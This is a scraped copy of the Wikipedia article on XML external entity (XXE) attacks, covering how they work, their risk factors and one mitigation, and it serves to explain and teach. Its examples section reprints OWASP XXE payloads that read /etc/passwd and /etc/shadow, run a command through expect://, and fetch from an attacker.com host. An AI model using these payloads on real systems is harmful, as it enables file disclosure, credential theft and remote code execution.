fbpx
Wikipedia

XML external entity attack

XML External Entity attack, or simply XXE attack, is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, DoS attacks, server-side request forgery, port scanning from the perspective of the machine where the parser is located, and other[which?] system impacts.[1]

Description edit

The XML 1.0 standard defines the structure of an XML document. The standard defines a concept called an entity, which is a term that refers to multiple types of data unit. One of those types of entities is an external general/parameter parsed entity, often shortened to external entity, that can access local or remote content via a declared system identifier. The system identifier is assumed to be a URI that can be accessed by the XML processor when processing the entity. The XML processor then replaces occurrences of the named external entity with the contents that is referenced by the system identifier. If the system identifier contains tainted data and the XML processor dereferences this tainted data, the XML processor may disclose confidential information normally not accessible by the application. Similar attack vectors apply the usage of external DTDs, external style sheets, external schemas, etc. which, when included, allow similar external resource inclusion style attacks.

Attacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file:// schemes or relative paths in the system identifier. Since the attack occurs relative to the application processing the XML document, an attacker may use this trusted application to pivot to other internal systems, possibly disclosing other internal content via HTTP requests or launching a CSRF attack to any unprotected internal services. In some situations, an XML processor library that is vulnerable to client-side memory corruption issues may be exploited by dereferencing a malicious URI, possibly allowing arbitrary code execution under the application account. Other attacks can access local resources that may not stop returning data, possibly impacting application availability if too many threads or processes are not released.

The application does not need to explicitly return the response to the attacker for it to be vulnerable to information disclosures. An attacker can leverage DNS information to exfiltrate data through subdomain names to a DNS server under their control.[2]

Risk factors edit

  • The application parses XML documents.
  • Tainted data is allowed within the system identifier portion of the entity, within the document type definition (DTD).
  • The XML processor is configured to validate and process the DTD.
  • The XML processor is configured to resolve external entities within the DTD.

Examples edit

The examples below are from OWASP's Testing for XML Injection (WSTG-INPV-07).[3]

Accessing a local resource that may not return edit

 <?xml version="1.0" encoding="ISO-8859-1"?>  <!DOCTYPE foo [   <!ELEMENT foo ANY >  <!ENTITY xxe SYSTEM "file:///dev/random" >]><foo>&xxe;</foo> 

Remote code execution edit

When the PHP "expect" module is loaded, remote code execution may be possible with a modified payload.

 <?xml version="1.0" encoding="ISO-8859-1"?>  <!DOCTYPE foo [ <!ELEMENT foo ANY >  <!ENTITY xxe SYSTEM "expect://id" >]>  <creds>  <user>&xxe;</user>  <pass>mypass</pass>  </creds> 

Disclosing /etc/passwd or other targeted files edit

 <?xml version="1.0" encoding="ISO-8859-1"?>  <!DOCTYPE foo [   <!ELEMENT foo ANY >  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>    <?xml version="1.0" encoding="ISO-8859-1"?>  <!DOCTYPE foo [   <!ELEMENT foo ANY >  <!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>    <?xml version="1.0" encoding="ISO-8859-1"?>  <!DOCTYPE foo [   <!ELEMENT foo ANY >  <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>    <?xml version="1.0" encoding="ISO-8859-1"?>  <!DOCTYPE foo [   <!ELEMENT foo ANY >  <!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt" >]><foo>&xxe;</foo> 

Mitigation edit

Since the entire XML document is communicated from an untrusted client, it is not usually possible to selectively validate or escape tainted data within the system identifier in the DTD. The XML processor could be configured to use a local static DTD and disallow any declared DTD included in the XML document.

See also edit

References edit

  1. ^ "What Are XML External Entity (XXE) Attacks". Acunetix. Retrieved 2023-11-13.
  2. ^ "OWASP Testing Guide v3" (PDF). Open Web Application Security Project. 2008. Retrieved 2023-11-13.
  3. ^ "Testing For XML Injection (WSTG-INPV-07), Web Security Testing Guide v4.2". OWASP. 2020-12-03. from the original on 2021-04-20. Retrieved 2023-03-16.

External links edit

  • OWASP XML External Entity (XXE) Prevention Cheat Sheet
  • Timothy Morgan's 2014 Paper: XML Schema, DTD, and Entity Attacks - A Compendium of Known Techniques[dead link]
  • Precursor presentation of above paper - at OWASP AppSec USA 2013
  • CWE-611: Information Exposure Through XML External Entity Reference
  • CWE-827: Improper Control of Document Type Definition
  • Sascha Herzog's Presentation on XML External Entity Attacks - at OWASP AppSec Germany 2010
  • PostgreSQL XXE vulnerability
  • SharePoint and DotNetNuke XXE Vulnerabilities, in French
  • XML Denial of Service Attacks and Defenses (in .NET)
  • Early (2002) BugTraq Article on XXE[dead link] 2019-09-02 at the Wayback Machine
  • XML 1.0 Extensible Markup Language (XML) 1.0 (Fifth Edition)

external, entity, attack, this, article, multiple, issues, please, help, improve, discuss, these, issues, talk, page, learn, when, remove, these, template, messages, this, article, tone, style, reflect, encyclopedic, tone, used, wikipedia, wikipedia, guide, wr. This article has multiple issues Please help improve it or discuss these issues on the talk page Learn how and when to remove these template messages This article s tone or style may not reflect the encyclopedic tone used on Wikipedia See Wikipedia s guide to writing better articles for suggestions March 2019 Learn how and when to remove this template message This article includes a list of general references but it lacks sufficient corresponding inline citations Please help to improve this article by introducing more precise citations March 2019 Learn how and when to remove this template message Learn how and when to remove this template message XML External Entity attack or simply XXE attack is a type of attack against an application that parses XML input This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser This attack may lead to the disclosure of confidential data DoS attacks server side request forgery port scanning from the perspective of the machine where the parser is located and other which system impacts 1 Contents 1 Description 2 Risk factors 3 Examples 3 1 Accessing a local resource that may not return 3 2 Remote code execution 3 3 Disclosing etc passwd or other targeted files 4 Mitigation 5 See also 6 References 7 External linksDescription editThe XML 1 0 standard defines the structure of an XML document The standard defines a concept called an entity which is a term that refers to multiple types of data unit One of those types of entities is an external general parameter parsed entity often shortened to external entity that can access local or remote content via a declared system identifier The system identifier is assumed to be a URI that can be accessed by the XML processor when processing the entity The XML processor then replaces occurrences of the named external entity with the contents that is referenced by the system identifier If the system identifier contains tainted data and the XML processor dereferences this tainted data the XML processor may disclose confidential information normally not accessible by the application Similar attack vectors apply the usage of external DTDs external style sheets external schemas etc which when included allow similar external resource inclusion style attacks Attacks can include disclosing local files which may contain sensitive data such as passwords or private user data using file schemes or relative paths in the system identifier Since the attack occurs relative to the application processing the XML document an attacker may use this trusted application to pivot to other internal systems possibly disclosing other internal content via HTTP requests or launching a CSRF attack to any unprotected internal services In some situations an XML processor library that is vulnerable to client side memory corruption issues may be exploited by dereferencing a malicious URI possibly allowing arbitrary code execution under the application account Other attacks can access local resources that may not stop returning data possibly impacting application availability if too many threads or processes are not released The application does not need to explicitly return the response to the attacker for it to be vulnerable to information disclosures An attacker can leverage DNS information to exfiltrate data through subdomain names to a DNS server under their control 2 Risk factors editThe application parses XML documents Tainted data is allowed within the system identifier portion of the entity within the document type definition DTD The XML processor is configured to validate and process the DTD The XML processor is configured to resolve external entities within the DTD Examples editThe examples below are from OWASP s Testing for XML Injection WSTG INPV 07 3 Accessing a local resource that may not return edit lt xml version 1 0 encoding ISO 8859 1 gt lt DOCTYPE foo lt ELEMENT foo ANY gt lt ENTITY xxe SYSTEM file dev random gt gt lt foo gt amp xxe lt foo gt Remote code execution edit When the PHP expect module is loaded remote code execution may be possible with a modified payload lt xml version 1 0 encoding ISO 8859 1 gt lt DOCTYPE foo lt ELEMENT foo ANY gt lt ENTITY xxe SYSTEM expect id gt gt lt creds gt lt user gt amp xxe lt user gt lt pass gt mypass lt pass gt lt creds gt Disclosing etc passwd or other targeted files edit lt xml version 1 0 encoding ISO 8859 1 gt lt DOCTYPE foo lt ELEMENT foo ANY gt lt ENTITY xxe SYSTEM file etc passwd gt gt lt foo gt amp xxe lt foo gt lt xml version 1 0 encoding ISO 8859 1 gt lt DOCTYPE foo lt ELEMENT foo ANY gt lt ENTITY xxe SYSTEM file etc shadow gt gt lt foo gt amp xxe lt foo gt lt xml version 1 0 encoding ISO 8859 1 gt lt DOCTYPE foo lt ELEMENT foo ANY gt lt ENTITY xxe SYSTEM file c boot ini gt gt lt foo gt amp xxe lt foo gt lt xml version 1 0 encoding ISO 8859 1 gt lt DOCTYPE foo lt ELEMENT foo ANY gt lt ENTITY xxe SYSTEM http www attacker com text txt gt gt lt foo gt amp xxe lt foo gt Mitigation editSince the entire XML document is communicated from an untrusted client it is not usually possible to selectively validate or escape tainted data within the system identifier in the DTD The XML processor could be configured to use a local static DTD and disallow any declared DTD included in the XML document See also editSQL injection Blind SQL injectionReferences edit What Are XML External Entity XXE Attacks Acunetix Retrieved 2023 11 13 OWASP Testing Guide v3 PDF Open Web Application Security Project 2008 Retrieved 2023 11 13 Testing For XML Injection WSTG INPV 07 Web Security Testing Guide v4 2 OWASP 2020 12 03 Archived from the original on 2021 04 20 Retrieved 2023 03 16 External links editOWASP XML External Entity XXE Prevention Cheat Sheet Timothy Morgan s 2014 Paper XML Schema DTD and Entity Attacks A Compendium of Known Techniques dead link Precursor presentation of above paper at OWASP AppSec USA 2013 CWE 611 Information Exposure Through XML External Entity Reference CWE 827 Improper Control of Document Type Definition Sascha Herzog s Presentation on XML External Entity Attacks at OWASP AppSec Germany 2010 PostgreSQL XXE vulnerability SharePoint and DotNetNuke XXE Vulnerabilities in French XML Denial of Service Attacks and Defenses in NET Early 2002 BugTraq Article on XXE dead link Archived 2019 09 02 at the Wayback Machine XML 1 0 Extensible Markup Language XML 1 0 Fifth Edition Retrieved from https en wikipedia org w index php title XML external entity attack amp oldid 1184974343, wikipedia, wiki, book, books, library,

article

, read, download, free, free download, mp3, video, mp4, 3gp, jpg, jpeg, gif, png, picture, music, song, movie, book, game, games.